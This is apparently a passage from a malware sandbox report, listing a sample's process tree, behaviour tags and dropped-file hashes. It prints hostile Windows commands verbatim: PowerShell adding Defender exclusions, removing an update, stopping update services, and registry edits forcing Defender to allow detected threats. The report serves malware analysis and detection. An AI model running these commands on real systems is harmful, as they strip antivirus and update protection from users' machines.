                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3028 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:1
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:2952
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4680 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:376
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 --field-trial-handle=1992,i,16122635009866968439,13252846517868265168,131072 /prefetch:8
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:3956
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:3220
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4372
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5972 -ip 5972
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1484
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:5440
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:5984
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:6032
                                                                                                                                                                                                • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                                  C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:3460
                                                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                    PID:4700
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5064
                                                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:832
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:3276
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:5564
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:5820
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:2024
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:1740
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:4004
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:2356
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:5392
                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                        C:\Windows\system32\conhost.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5468
                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                      • C:\Windows\system32\winsvc.exe
                                                                                                                                                                                                        C:\Windows\system32\winsvc.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:2636
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:4264
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSB65.tmp\Install.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zSB65.tmp\Install.exe oU /HMwdidXO 385134 /S
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                        PID:6048
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3324
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5308
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5136
                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:5192
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3552
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:2864
                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:5340
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5184
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:5772
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5972
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:2872
                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:6052
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1304
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:5668
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                              PID:4788
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:2596
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                          PID:3892
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:1592
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:5760
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:2272
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5928
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4484
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:1172
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4660
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:5828
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5688
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5012
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:3500
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:960
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:5944
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4388
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:3608
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:5492
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:2852

                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix

                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                    • C:\Users\Admin\1000015002\c6df8df0dd.exe
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      1.8MB

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      3cc49f14ef0ef9ea942740dd6cff1536

                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                      a4d4cac4fe01f027caeccb322a4f71a5b03abdd9

                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                      d868becc66a066ad30691b268b4f0289585f2be543f4066c57c1d3bf8e589a19

                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                      d529316301278a361aa5c67c1ab3899730ad14a10d748cca30ca55146a83f8b9294f89c9c811ea4c234388349dab5c4f5314ebbddd9e818287d388b4cb286309

                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                      2B

                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                      SHA1

